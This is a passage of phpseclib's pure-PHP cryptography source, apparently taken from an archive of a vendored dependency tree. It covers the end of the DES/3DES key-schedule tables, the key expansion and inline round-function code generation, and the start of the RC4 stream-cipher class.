0x09050010, 0x09050810, 0x01040110, 0x01040910, 0x09040110, 0x09040910, 0x01050110, 0x01050910, 0x09050110, 0x09050910, 0x01040110, 0x01040910, 0x09040110, 0x09040910, 0x01050110, 0x01050910, 0x09050110, 0x09050910 ]; static $pc2mapc3 = [ 0x00000000, 0x00000004, 0x00001000, 0x00001004, 0x00000000, 0x00000004, 0x00001000, 0x00001004, 0x10000000, 0x10000004, 0x10001000, 0x10001004, 0x10000000, 0x10000004, 0x10001000, 0x10001004, 0x00000020, 0x00000024, 0x00001020, 0x00001024, 0x00000020, 0x00000024, 0x00001020, 0x00001024, 0x10000020, 0x10000024, 0x10001020, 0x10001024, 0x10000020, 0x10000024, 0x10001020, 0x10001024, 0x00080000, 0x00080004, 0x00081000, 0x00081004, 0x00080000, 0x00080004, 0x00081000, 0x00081004, 0x10080000, 0x10080004, 0x10081000, 0x10081004, 0x10080000, 0x10080004, 0x10081000, 0x10081004, 0x00080020, 0x00080024, 0x00081020, 0x00081024, 0x00080020, 0x00080024, 0x00081020, 0x00081024, 0x10080020, 0x10080024, 0x10081020, 0x10081024, 0x10080020, 0x10080024, 0x10081020, 0x10081024, 0x20000000, 0x20000004, 0x20001000, 0x20001004, 0x20000000, 0x20000004, 0x20001000, 0x20001004, 0x30000000, 0x30000004, 0x30001000, 0x30001004, 0x30000000, 0x30000004, 0x30001000, 0x30001004, 0x20000020, 0x20000024, 0x20001020, 0x20001024, 0x20000020, 0x20000024, 0x20001020, 0x20001024, 0x30000020, 0x30000024, 0x30001020, 0x30001024, 0x30000020, 0x30000024, 0x30001020, 0x30001024, 0x20080000, 0x20080004, 0x20081000, 0x20081004, 0x20080000, 0x20080004, 0x20081000, 0x20081004, 0x30080000, 0x30080004, 0x30081000, 0x30081004, 0x30080000, 0x30080004, 0x30081000, 0x30081004, 0x20080020, 0x20080024, 0x20081020, 0x20081024, 0x20080020, 0x20080024, 0x20081020, 0x20081024, 0x30080020, 0x30080024, 0x30081020, 0x30081024, 0x30080020, 0x30080024, 0x30081020, 0x30081024, 0x00000002, 0x00000006, 0x00001002, 0x00001006, 0x00000002, 0x00000006, 0x00001002, 0x00001006, 0x10000002, 0x10000006, 0x10001002, 0x10001006, 0x10000002, 0x10000006, 0x10001002, 0x10001006, 0x00000022, 0x00000026, 0x00001022, 0x00001026, 0x00000022, 0x00000026, 0x00001022, 0x00001026, 0x10000022, 0x10000026, 0x10001022, 0x10001026, 0x10000022, 0x10000026, 0x10001022, 0x10001026, 0x00080002, 0x00080006, 0x00081002, 0x00081006, 0x00080002, 0x00080006, 0x00081002, 0x00081006, 0x10080002, 0x10080006, 0x10081002, 0x10081006, 0x10080002, 0x10080006, 0x10081002, 0x10081006, 0x00080022, 0x00080026, 0x00081022, 0x00081026, 0x00080022, 0x00080026, 0x00081022, 0x00081026, 0x10080022, 0x10080026, 0x10081022, 0x10081026, 0x10080022, 0x10080026, 0x10081022, 0x10081026, 0x20000002, 0x20000006, 0x20001002, 0x20001006, 0x20000002, 0x20000006, 0x20001002, 0x20001006, 0x30000002, 0x30000006, 0x30001002, 0x30001006, 0x30000002, 0x30000006, 0x30001002, 0x30001006, 0x20000022, 0x20000026, 0x20001022, 0x20001026, 0x20000022, 0x20000026, 0x20001022, 0x20001026, 0x30000022, 0x30000026, 0x30001022, 0x30001026, 0x30000022, 0x30000026, 0x30001022, 0x30001026, 0x20080002, 0x20080006, 0x20081002, 0x20081006, 0x20080002, 0x20080006, 0x20081002, 0x20081006, 0x30080002, 0x30080006, 0x30081002, 0x30081006, 0x30080002, 0x30080006, 0x30081002, 0x30081006, 0x20080022, 0x20080026, 0x20081022, 0x20081026, 0x20080022, 0x20080026, 0x20081022, 0x20081026, 0x30080022, 0x30080026, 0x30081022, 0x30081026, 0x30080022, 0x30080026, 0x30081022, 0x30081026 ]; static $pc2mapc4 = [ 0x00000000, 0x00100000, 0x00000008, 0x00100008, 0x00000200, 0x00100200, 0x00000208, 0x00100208, 0x00000000, 0x00100000, 0x00000008, 0x00100008, 0x00000200, 0x00100200, 0x00000208, 0x00100208, 0x04000000, 0x04100000, 0x04000008, 0x04100008, 0x04000200, 0x04100200, 0x04000208, 0x04100208, 0x04000000, 0x04100000, 0x04000008, 0x04100008, 0x04000200, 0x04100200, 0x04000208, 0x04100208, 0x00002000, 0x00102000, 0x00002008, 0x00102008, 0x00002200, 0x00102200, 0x00002208, 0x00102208, 0x00002000, 0x00102000, 0x00002008, 0x00102008, 0x00002200, 0x00102200, 0x00002208, 0x00102208, 0x04002000, 0x04102000, 0x04002008, 0x04102008, 0x04002200, 0x04102200, 0x04002208, 0x04102208, 0x04002000, 0x04102000, 0x04002008, 0x04102008, 0x04002200, 0x04102200, 0x04002208, 0x04102208, 0x00000000, 0x00100000, 0x00000008, 0x00100008, 0x00000200, 0x00100200, 0x00000208, 0x00100208, 0x00000000, 0x00100000, 0x00000008, 0x00100008, 0x00000200, 0x00100200, 0x00000208, 0x00100208, 0x04000000, 0x04100000, 0x04000008, 0x04100008, 0x04000200, 0x04100200, 0x04000208, 0x04100208, 0x04000000, 0x04100000, 0x04000008, 0x04100008, 0x04000200, 0x04100200, 0x04000208, 0x04100208, 0x00002000, 0x00102000, 0x00002008, 0x00102008, 0x00002200, 0x00102200, 0x00002208, 0x00102208, 0x00002000, 0x00102000, 0x00002008, 0x00102008, 0x00002200, 0x00102200, 0x00002208, 0x00102208, 0x04002000, 0x04102000, 0x04002008, 0x04102008, 0x04002200, 0x04102200, 0x04002208, 0x04102208, 0x04002000, 0x04102000, 0x04002008, 0x04102008, 0x04002200, 0x04102200, 0x04002208, 0x04102208, 0x00020000, 0x00120000, 0x00020008, 0x00120008, 0x00020200, 0x00120200, 0x00020208, 0x00120208, 0x00020000, 0x00120000, 0x00020008, 0x00120008, 0x00020200, 0x00120200, 0x00020208, 0x00120208, 0x04020000, 0x04120000, 0x04020008, 0x04120008, 0x04020200, 0x04120200, 0x04020208, 0x04120208, 0x04020000, 0x04120000, 0x04020008, 0x04120008, 0x04020200, 0x04120200, 0x04020208, 0x04120208, 0x00022000, 0x00122000, 0x00022008, 0x00122008, 0x00022200, 0x00122200, 0x00022208, 0x00122208, 0x00022000, 0x00122000, 0x00022008, 0x00122008, 0x00022200, 0x00122200, 0x00022208, 0x00122208, 0x04022000, 0x04122000, 0x04022008, 0x04122008, 0x04022200, 0x04122200, 0x04022208, 0x04122208, 0x04022000, 0x04122000, 0x04022008, 0x04122008, 0x04022200, 0x04122200, 0x04022208, 0x04122208, 0x00020000, 0x00120000, 0x00020008, 0x00120008, 0x00020200, 0x00120200, 0x00020208, 0x00120208, 0x00020000, 0x00120000, 0x00020008, 0x00120008, 0x00020200, 0x00120200, 0x00020208, 0x00120208, 0x04020000, 0x04120000, 0x04020008, 0x04120008, 0x04020200, 0x04120200, 0x04020208, 0x04120208, 0x04020000, 0x04120000, 0x04020008, 0x04120008, 0x04020200, 0x04120200, 0x04020208, 0x04120208, 0x00022000, 0x00122000, 0x00022008, 0x00122008, 0x00022200, 0x00122200, 0x00022208, 0x00122208, 0x00022000, 0x00122000, 0x00022008, 0x00122008, 0x00022200, 0x00122200, 0x00022208, 0x00122208, 0x04022000, 0x04122000, 0x04022008, 0x04122008, 0x04022200, 0x04122200, 0x04022208, 0x04122208, 0x04022000, 0x04122000, 0x04022008, 0x04122008, 0x04022200, 0x04122200, 0x04022208, 0x04122208 ]; static $pc2mapd1 = [ 0x00000000, 0x00000001, 0x08000000, 0x08000001, 0x00200000, 0x00200001, 0x08200000, 0x08200001, 0x00000002, 0x00000003, 0x08000002, 0x08000003, 0x00200002, 0x00200003, 0x08200002, 0x08200003 ]; static $pc2mapd2 = [ 0x00000000, 0x00100000, 0x00000800, 0x00100800, 0x00000000, 0x00100000, 0x00000800, 0x00100800, 0x04000000, 0x04100000, 0x04000800, 0x04100800, 0x04000000, 0x04100000, 0x04000800, 0x04100800, 0x00000004, 0x00100004, 0x00000804, 0x00100804, 0x00000004, 0x00100004, 0x00000804, 0x00100804, 0x04000004, 0x04100004, 0x04000804, 0x04100804, 0x04000004, 0x04100004, 0x04000804, 0x04100804, 0x00000000, 0x00100000, 0x00000800, 0x00100800, 0x00000000, 0x00100000, 0x00000800, 0x00100800, 0x04000000, 0x04100000, 0x04000800, 0x04100800, 0x04000000, 0x04100000, 0x04000800, 0x04100800, 0x00000004, 0x00100004, 0x00000804, 0x00100804, 0x00000004, 0x00100004, 0x00000804, 0x00100804, 0x04000004, 0x04100004, 0x04000804, 0x04100804, 0x04000004, 0x04100004, 0x04000804, 0x04100804, 0x00000200, 0x00100200, 0x00000A00, 0x00100A00, 0x00000200, 0x00100200, 0x00000A00, 0x00100A00, 0x04000200, 0x04100200, 0x04000A00, 0x04100A00, 0x04000200, 0x04100200, 0x04000A00, 0x04100A00, 0x00000204, 0x00100204, 0x00000A04, 0x00100A04, 0x00000204, 0x00100204, 0x00000A04, 0x00100A04, 0x04000204, 0x04100204, 0x04000A04, 0x04100A04, 0x04000204, 0x04100204, 0x04000A04, 0x04100A04, 0x00000200, 0x00100200, 0x00000A00, 0x00100A00, 0x00000200, 0x00100200, 0x00000A00, 0x00100A00, 0x04000200, 0x04100200, 0x04000A00, 0x04100A00, 0x04000200, 0x04100200, 0x04000A00, 0x04100A00, 0x00000204, 0x00100204, 0x00000A04, 0x00100A04, 0x00000204, 0x00100204, 0x00000A04, 0x00100A04, 0x04000204, 0x04100204, 0x04000A04, 0x04100A04, 0x04000204, 0x04100204, 0x04000A04, 0x04100A04, 0x00020000, 0x00120000, 0x00020800, 0x00120800, 0x00020000, 0x00120000, 0x00020800, 0x00120800, 0x04020000, 0x04120000, 0x04020800, 0x04120800, 0x04020000, 0x04120000, 0x04020800, 0x04120800, 0x00020004, 0x00120004, 0x00020804, 0x00120804, 0x00020004, 0x00120004, 0x00020804, 0x00120804, 0x04020004, 0x04120004, 0x04020804, 0x04120804, 0x04020004, 0x04120004, 0x04020804, 0x04120804, 0x00020000, 0x00120000, 0x00020800, 0x00120800, 0x00020000, 0x00120000, 0x00020800, 0x00120800, 0x04020000, 0x04120000, 0x04020800, 0x04120800, 0x04020000, 0x04120000, 0x04020800, 0x04120800, 0x00020004, 0x00120004, 0x00020804, 0x00120804, 0x00020004, 0x00120004, 0x00020804, 0x00120804, 0x04020004, 0x04120004, 0x04020804, 0x04120804, 0x04020004, 0x04120004, 0x04020804, 0x04120804, 0x00020200, 0x00120200, 0x00020A00, 0x00120A00, 0x00020200, 0x00120200, 0x00020A00, 0x00120A00, 0x04020200, 0x04120200, 0x04020A00, 0x04120A00, 0x04020200, 0x04120200, 0x04020A00, 0x04120A00, 0x00020204, 0x00120204, 0x00020A04, 0x00120A04, 0x00020204, 0x00120204, 0x00020A04, 0x00120A04, 0x04020204, 0x04120204, 0x04020A04, 0x04120A04, 0x04020204, 0x04120204, 0x04020A04, 0x04120A04, 0x00020200, 0x00120200, 0x00020A00, 0x00120A00, 0x00020200, 0x00120200, 0x00020A00, 0x00120A00, 0x04020200, 0x04120200, 0x04020A00, 0x04120A00, 0x04020200, 0x04120200, 0x04020A00, 0x04120A00, 0x00020204, 0x00120204, 0x00020A04, 0x00120A04, 0x00020204, 0x00120204, 0x00020A04, 0x00120A04, 0x04020204, 0x04120204, 0x04020A04, 0x04120A04, 0x04020204, 0x04120204, 0x04020A04, 0x04120A04 ]; static $pc2mapd3 = [ 0x00000000, 0x00010000, 0x02000000, 0x02010000, 0x00000020, 0x00010020, 0x02000020, 0x02010020, 0x00040000, 0x00050000, 0x02040000, 0x02050000, 0x00040020, 0x00050020, 0x02040020, 0x02050020, 0x00002000, 0x00012000, 0x02002000, 0x02012000, 0x00002020, 0x00012020, 0x02002020, 0x02012020, 0x00042000, 0x00052000, 0x02042000, 0x02052000, 0x00042020, 0x00052020, 0x02042020, 0x02052020, 0x00000000, 0x00010000, 0x02000000, 0x02010000, 0x00000020, 0x00010020, 0x02000020, 0x02010020, 0x00040000, 0x00050000, 0x02040000, 0x02050000, 0x00040020, 0x00050020, 0x02040020, 0x02050020, 0x00002000, 0x00012000, 0x02002000, 0x02012000, 0x00002020, 0x00012020, 0x02002020, 0x02012020, 0x00042000, 0x00052000, 0x02042000, 0x02052000, 0x00042020, 0x00052020, 0x02042020, 0x02052020, 0x00000010, 0x00010010, 0x02000010, 0x02010010, 0x00000030, 0x00010030, 0x02000030, 0x02010030, 0x00040010, 0x00050010, 0x02040010, 0x02050010, 0x00040030, 0x00050030, 0x02040030, 0x02050030, 0x00002010, 0x00012010, 0x02002010, 0x02012010, 0x00002030, 0x00012030, 0x02002030, 0x02012030, 0x00042010, 0x00052010, 0x02042010, 0x02052010, 0x00042030, 0x00052030, 0x02042030, 0x02052030, 0x00000010, 0x00010010, 0x02000010, 0x02010010, 0x00000030, 0x00010030, 0x02000030, 0x02010030, 0x00040010, 0x00050010, 0x02040010, 0x02050010, 0x00040030, 0x00050030, 0x02040030, 0x02050030, 0x00002010, 0x00012010, 0x02002010, 0x02012010, 0x00002030, 0x00012030, 0x02002030, 0x02012030, 0x00042010, 0x00052010, 0x02042010, 0x02052010, 0x00042030, 0x00052030, 0x02042030, 0x02052030, 0x20000000, 0x20010000, 0x22000000, 0x22010000, 0x20000020, 0x20010020, 0x22000020, 0x22010020, 0x20040000, 0x20050000, 0x22040000, 0x22050000, 0x20040020, 0x20050020, 0x22040020, 0x22050020, 0x20002000, 0x20012000, 0x22002000, 0x22012000, 0x20002020, 0x20012020, 0x22002020, 0x22012020, 0x20042000, 0x20052000, 0x22042000, 0x22052000, 0x20042020, 0x20052020, 0x22042020, 0x22052020, 0x20000000, 0x20010000, 0x22000000, 0x22010000, 0x20000020, 0x20010020, 0x22000020, 0x22010020, 0x20040000, 0x20050000, 0x22040000, 0x22050000, 0x20040020, 0x20050020, 0x22040020, 0x22050020, 0x20002000, 0x20012000, 0x22002000, 0x22012000, 0x20002020, 0x20012020, 0x22002020, 0x22012020, 0x20042000, 0x20052000, 0x22042000, 0x22052000, 0x20042020, 0x20052020, 0x22042020, 0x22052020, 0x20000010, 0x20010010, 0x22000010, 0x22010010, 0x20000030, 0x20010030, 0x22000030, 0x22010030, 0x20040010, 0x20050010, 0x22040010, 0x22050010, 0x20040030, 0x20050030, 0x22040030, 0x22050030, 0x20002010, 0x20012010, 0x22002010, 0x22012010, 0x20002030, 0x20012030, 0x22002030, 0x22012030, 0x20042010, 0x20052010, 0x22042010, 0x22052010, 0x20042030, 0x20052030, 0x22042030, 0x22052030, 0x20000010, 0x20010010, 0x22000010, 0x22010010, 0x20000030, 0x20010030, 0x22000030, 0x22010030, 0x20040010, 0x20050010, 0x22040010, 0x22050010, 0x20040030, 0x20050030, 0x22040030, 0x22050030, 0x20002010, 0x20012010, 0x22002010, 0x22012010, 0x20002030, 0x20012030, 0x22002030, 0x22012030, 0x20042010, 0x20052010, 0x22042010, 0x22052010, 0x20042030, 0x20052030, 0x22042030, 0x22052030 ]; static $pc2mapd4 = [ 0x00000000, 0x00000400, 0x01000000, 0x01000400, 0x00000000, 0x00000400, 0x01000000, 0x01000400, 0x00000100, 0x00000500, 0x01000100, 0x01000500, 0x00000100, 0x00000500, 0x01000100, 0x01000500, 0x10000000, 0x10000400, 0x11000000, 0x11000400, 0x10000000, 0x10000400, 0x11000000, 0x11000400, 0x10000100, 0x10000500, 0x11000100, 0x11000500, 0x10000100, 0x10000500, 0x11000100, 0x11000500, 0x00080000, 0x00080400, 0x01080000, 0x01080400, 0x00080000, 0x00080400, 0x01080000, 0x01080400, 0x00080100, 0x00080500, 0x01080100, 0x01080500, 0x00080100, 0x00080500, 0x01080100, 0x01080500, 0x10080000, 0x10080400, 0x11080000, 0x11080400, 0x10080000, 0x10080400, 0x11080000, 0x11080400, 0x10080100, 0x10080500, 0x11080100, 0x11080500, 0x10080100, 0x10080500, 0x11080100, 0x11080500, 0x00000008, 0x00000408, 0x01000008, 0x01000408, 0x00000008, 0x00000408, 0x01000008, 0x01000408, 0x00000108, 0x00000508, 0x01000108, 0x01000508, 0x00000108, 0x00000508, 0x01000108, 0x01000508, 0x10000008, 0x10000408, 0x11000008, 0x11000408, 0x10000008, 0x10000408, 0x11000008, 0x11000408, 0x10000108, 0x10000508, 0x11000108, 0x11000508, 0x10000108, 0x10000508, 0x11000108, 0x11000508, 0x00080008, 0x00080408, 0x01080008, 0x01080408, 0x00080008, 0x00080408, 0x01080008, 0x01080408, 0x00080108, 0x00080508, 0x01080108, 0x01080508, 0x00080108, 0x00080508, 0x01080108, 0x01080508, 0x10080008, 0x10080408, 0x11080008, 0x11080408, 0x10080008, 0x10080408, 0x11080008, 0x11080408, 0x10080108, 0x10080508, 0x11080108, 0x11080508, 0x10080108, 0x10080508, 0x11080108, 0x11080508, 0x00001000, 0x00001400, 0x01001000, 0x01001400, 0x00001000, 0x00001400, 0x01001000, 0x01001400, 0x00001100, 0x00001500, 0x01001100, 0x01001500, 0x00001100, 0x00001500, 0x01001100, 0x01001500, 0x10001000, 0x10001400, 0x11001000, 0x11001400, 0x10001000, 0x10001400, 0x11001000, 0x11001400, 0x10001100, 0x10001500, 0x11001100, 0x11001500, 0x10001100, 0x10001500, 0x11001100, 0x11001500, 0x00081000, 0x00081400, 0x01081000, 0x01081400, 0x00081000, 0x00081400, 0x01081000, 0x01081400, 0x00081100, 0x00081500, 0x01081100, 0x01081500, 0x00081100, 0x00081500, 0x01081100, 0x01081500, 0x10081000, 0x10081400, 0x11081000, 0x11081400, 0x10081000, 0x10081400, 0x11081000, 0x11081400, 0x10081100, 0x10081500, 0x11081100, 0x11081500, 0x10081100, 0x10081500, 0x11081100, 0x11081500, 0x00001008, 0x00001408, 0x01001008, 0x01001408, 0x00001008, 0x00001408, 0x01001008, 0x01001408, 0x00001108, 0x00001508, 0x01001108, 0x01001508, 0x00001108, 0x00001508, 0x01001108, 0x01001508, 0x10001008, 0x10001408, 0x11001008, 0x11001408, 0x10001008, 0x10001408, 0x11001008, 0x11001408, 0x10001108, 0x10001508, 0x11001108, 0x11001508, 0x10001108, 0x10001508, 0x11001108, 0x11001508, 0x00081008, 0x00081408, 0x01081008, 0x01081408, 0x00081008, 0x00081408, 0x01081008, 0x01081408, 0x00081108, 0x00081508, 0x01081108, 0x01081508, 0x00081108, 0x00081508, 0x01081108, 0x01081508, 0x10081008, 0x10081408, 0x11081008, 0x11081408, 0x10081008, 0x10081408, 0x11081008, 0x11081408, 0x10081108, 0x10081508, 0x11081108, 0x11081508, 0x10081108, 0x10081508, 0x11081108, 0x11081508 ]; $keys = []; for ($des_round = 0; $des_round < $this->des_rounds; ++$des_round) { // pad the key and remove extra characters as appropriate. $key = str_pad(substr($this->key, $des_round * 8, 8), 8, "\0"); // Perform the PC/1 transformation and compute C and D. $t = unpack('Nl/Nr', $key); list($l, $r) = [$t['l'], $t['r']]; $key = (self::$shuffle[$pc1map[ $r & 0xFF]] & "\x80\x80\x80\x80\x80\x80\x80\x00") | (self::$shuffle[$pc1map[($r >> 8) & 0xFF]] & "\x40\x40\x40\x40\x40\x40\x40\x00") | (self::$shuffle[$pc1map[($r >> 16) & 0xFF]] & "\x20\x20\x20\x20\x20\x20\x20\x00") | (self::$shuffle[$pc1map[($r >> 24) & 0xFF]] & "\x10\x10\x10\x10\x10\x10\x10\x00") | (self::$shuffle[$pc1map[ $l & 0xFF]] & "\x08\x08\x08\x08\x08\x08\x08\x00") | (self::$shuffle[$pc1map[($l >> 8) & 0xFF]] & "\x04\x04\x04\x04\x04\x04\x04\x00") | (self::$shuffle[$pc1map[($l >> 16) & 0xFF]] & "\x02\x02\x02\x02\x02\x02\x02\x00") | (self::$shuffle[$pc1map[($l >> 24) & 0xFF]] & "\x01\x01\x01\x01\x01\x01\x01\x00"); $key = unpack('Nc/Nd', $key); $c = ( $key['c'] >> 4) & 0x0FFFFFFF; $d = (($key['d'] >> 4) & 0x0FFFFFF0) | ($key['c'] & 0x0F); $keys[$des_round] = [ self::ENCRYPT => [], self::DECRYPT => array_fill(0, 32, 0) ]; for ($i = 0, $ki = 31; $i < 16; ++$i, $ki -= 2) { $c <<= $shifts[$i]; $c = ($c | ($c >> 28)) & 0x0FFFFFFF; $d <<= $shifts[$i]; $d = ($d | ($d >> 28)) & 0x0FFFFFFF; // Perform the PC-2 transformation. $cp = $pc2mapc1[ $c >> 24 ] | $pc2mapc2[($c >> 16) & 0xFF] | $pc2mapc3[($c >> 8) & 0xFF] | $pc2mapc4[ $c & 0xFF]; $dp = $pc2mapd1[ $d >> 24 ] | $pc2mapd2[($d >> 16) & 0xFF] | $pc2mapd3[($d >> 8) & 0xFF] | $pc2mapd4[ $d & 0xFF]; // Reorder: odd bytes/even bytes. Push the result in key schedule. $val1 = ( $cp & intval(0xFF000000)) | (($cp << 8) & 0x00FF0000) | (($dp >> 16) & 0x0000FF00) | (($dp >> 8) & 0x000000FF); $val2 = (($cp << 8) & intval(0xFF000000)) | (($cp << 16) & 0x00FF0000) | (($dp >> 8) & 0x0000FF00) | ( $dp & 0x000000FF); $keys[$des_round][self::ENCRYPT][ ] = $val1; $keys[$des_round][self::DECRYPT][$ki - 1] = $val1; $keys[$des_round][self::ENCRYPT][ ] = $val2; $keys[$des_round][self::DECRYPT][$ki ] = $val2; } } switch ($this->des_rounds) { case 3: // 3DES keys $this->keys = [ self::ENCRYPT => array_merge( $keys[0][self::ENCRYPT], $keys[1][self::DECRYPT], $keys[2][self::ENCRYPT] ), self::DECRYPT => array_merge( $keys[2][self::DECRYPT], $keys[1][self::ENCRYPT], $keys[0][self::DECRYPT] ) ]; break; // case 1: // DES keys default: $this->keys = [ self::ENCRYPT => $keys[0][self::ENCRYPT], self::DECRYPT => $keys[0][self::DECRYPT] ]; } } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupInlineCrypt() */ protected function setupInlineCrypt() { // Engine configuration for: // - DES ($des_rounds == 1) or // - 3DES ($des_rounds == 3) $des_rounds = $this->des_rounds; $init_crypt = 'static $sbox1, $sbox2, $sbox3, $sbox4, $sbox5, $sbox6, $sbox7, $sbox8, $shuffleip, $shuffleinvip; if (!$sbox1) { $sbox1 = array_map("intval", self::$sbox1); $sbox2 = array_map("intval", self::$sbox2); $sbox3 = array_map("intval", self::$sbox3); $sbox4 = array_map("intval", self::$sbox4); $sbox5 = array_map("intval", self::$sbox5); $sbox6 = array_map("intval", self::$sbox6); $sbox7 = array_map("intval", self::$sbox7); $sbox8 = array_map("intval", self::$sbox8);' /* Merge $shuffle with $[inv]ipmap */ . ' for ($i = 0; $i < 256; ++$i) { $shuffleip[] = self::$shuffle[self::$ipmap[$i]]; $shuffleinvip[] = self::$shuffle[self::$invipmap[$i]]; } } '; $k = [ self::ENCRYPT => $this->keys[self::ENCRYPT], self::DECRYPT => $this->keys[self::DECRYPT] ]; $init_encrypt = ''; $init_decrypt = ''; // Creating code for en- and decryption. $crypt_block = []; foreach ([self::ENCRYPT, self::DECRYPT] as $c) { /* Do the initial IP permutation. */ $crypt_block[$c] = ' $in = unpack("N*", $in); $l = $in[1]; $r = $in[2]; $in = unpack("N*", ($shuffleip[ $r & 0xFF] & "\x80\x80\x80\x80\x80\x80\x80\x80") | ($shuffleip[($r >> 8) & 0xFF] & "\x40\x40\x40\x40\x40\x40\x40\x40") | ($shuffleip[($r >> 16) & 0xFF] & "\x20\x20\x20\x20\x20\x20\x20\x20") | ($shuffleip[($r >> 24) & 0xFF] & "\x10\x10\x10\x10\x10\x10\x10\x10") | ($shuffleip[ $l & 0xFF] & "\x08\x08\x08\x08\x08\x08\x08\x08") | ($shuffleip[($l >> 8) & 0xFF] & "\x04\x04\x04\x04\x04\x04\x04\x04") | ($shuffleip[($l >> 16) & 0xFF] & "\x02\x02\x02\x02\x02\x02\x02\x02") | ($shuffleip[($l >> 24) & 0xFF] & "\x01\x01\x01\x01\x01\x01\x01\x01") ); ' . /* Extract L0 and R0 */ ' $l = $in[1]; $r = $in[2]; '; $l = '$l'; $r = '$r'; // Perform DES or 3DES. for ($ki = -1, $des_round = 0; $des_round < $des_rounds; ++$des_round) { // Perform the 16 steps. for ($i = 0; $i < 16; ++$i) { // start of "the Feistel (F) function" - see the following URL: // http://en.wikipedia.org/wiki/Image:Data_Encryption_Standard_InfoBox_Diagram.png // Merge key schedule. $crypt_block[$c] .= ' $b1 = ((' . $r . ' >> 3) & 0x1FFFFFFF) ^ (' . $r . ' << 29) ^ ' . $k[$c][++$ki] . '; $b2 = ((' . $r . ' >> 31) & 0x00000001) ^ (' . $r . ' << 1) ^ ' . $k[$c][++$ki] . ';' . /* S-box indexing. */ $l . ' = $sbox1[($b1 >> 24) & 0x3F] ^ $sbox2[($b2 >> 24) & 0x3F] ^ $sbox3[($b1 >> 16) & 0x3F] ^ $sbox4[($b2 >> 16) & 0x3F] ^ $sbox5[($b1 >> 8) & 0x3F] ^ $sbox6[($b2 >> 8) & 0x3F] ^ $sbox7[ $b1 & 0x3F] ^ $sbox8[ $b2 & 0x3F] ^ ' . $l . '; '; // end of "the Feistel (F) function" // swap L & R list($l, $r) = [$r, $l]; } list($l, $r) = [$r, $l]; } // Perform the inverse IP permutation. $crypt_block[$c] .= '$in = ($shuffleinvip[($l >> 24) & 0xFF] & "\x80\x80\x80\x80\x80\x80\x80\x80") | ($shuffleinvip[($r >> 24) & 0xFF] & "\x40\x40\x40\x40\x40\x40\x40\x40") | ($shuffleinvip[($l >> 16) & 0xFF] & "\x20\x20\x20\x20\x20\x20\x20\x20") | ($shuffleinvip[($r >> 16) & 0xFF] & "\x10\x10\x10\x10\x10\x10\x10\x10") | ($shuffleinvip[($l >> 8) & 0xFF] & "\x08\x08\x08\x08\x08\x08\x08\x08") | ($shuffleinvip[($r >> 8) & 0xFF] & "\x04\x04\x04\x04\x04\x04\x04\x04") | ($shuffleinvip[ $l & 0xFF] & "\x02\x02\x02\x02\x02\x02\x02\x02") | ($shuffleinvip[ $r & 0xFF] & "\x01\x01\x01\x01\x01\x01\x01\x01"); '; } // Creates the inline-crypt function $this->inline_crypt = $this->createInlineCryptFunction( [ 'init_crypt' => $init_crypt, 'init_encrypt' => $init_encrypt, 'init_decrypt' => $init_decrypt, 'encrypt_block' => $crypt_block[self::ENCRYPT], 'decrypt_block' => $crypt_block[self::DECRYPT] ] ); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RC4.php000064400000016273147600400120020164 0ustar00 * setKey('abcdefgh'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $rc4->decrypt($rc4->encrypt($plaintext)); * ?> * * * @author Jim Wigginton * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\StreamCipher; /** * Pure-PHP implementation of RC4. * * @author Jim Wigginton */ class RC4 extends StreamCipher { /** * @see \phpseclib3\Crypt\RC4::_crypt() */ const ENCRYPT = 0; /** * @see \phpseclib3\Crypt\RC4::_crypt() */ const DECRYPT = 1; /** * Key Length (in bytes) * * @see \phpseclib3\Crypt\RC4::setKeyLength() * @var int */ protected $key_length = 128; // = 1024 bits /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'arcfour'; /** * The Key * * @see self::setKey() * @var string */ protected $key; /** * The Key Stream for decryption and encryption * * @see self::setKey() * @var array */ private $stream; /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { if ($engine == self::ENGINE_OPENSSL) { if ($this->continuousBuffer) { return false; } // quoting https://www.openssl.org/news/openssl-3.0-notes.html, OpenSSL 3.0.1 // "Moved all variations of the EVP ciphers CAST5, BF, IDEA, SEED, RC2, RC4, RC5, and DES to the legacy provider" // in theory openssl_get_cipher_methods() should catch this but, on GitHub Actions, at least, it does not if (defined('OPENSSL_VERSION_TEXT') && version_compare(preg_replace('#OpenSSL (\d+\.\d+\.\d+) .*#', '$1', OPENSSL_VERSION_TEXT), '3.0.1', '>=')) { return false; } $this->cipher_name_openssl = 'rc4-40'; } return parent::isValidEngineHelper($engine); } /** * Sets the key length * * Keys can be between 1 and 256 bytes long. * * @param int $length * @throws \LengthException if the key length is invalid */ public function setKeyLength($length) { if ($length < 8 || $length > 2048) { throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys between 1 and 256 bytes are supported'); } $this->key_length = $length >> 3; parent::setKeyLength($length); } /** * Sets the key length * * Keys can be between 1 and 256 bytes long. * * @param string $key */ public function setKey($key) { $length = strlen($key); if ($length < 1 || $length > 256) { throw new \LengthException('Key size of ' . $length . ' bytes is not supported by RC4. Keys must be between 1 and 256 bytes long'); } parent::setKey($key); } /** * Encrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @see self::crypt() * @param string $plaintext * @return string $ciphertext */ public function encrypt($plaintext) { if ($this->engine != self::ENGINE_INTERNAL) { return parent::encrypt($plaintext); } return $this->crypt($plaintext, self::ENCRYPT); } /** * Decrypts a message. * * $this->decrypt($this->encrypt($plaintext)) == $this->encrypt($this->encrypt($plaintext)). * At least if the continuous buffer is disabled. * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see self::crypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { if ($this->engine != self::ENGINE_INTERNAL) { return parent::decrypt($ciphertext); } return $this->crypt($ciphertext, self::DECRYPT); } 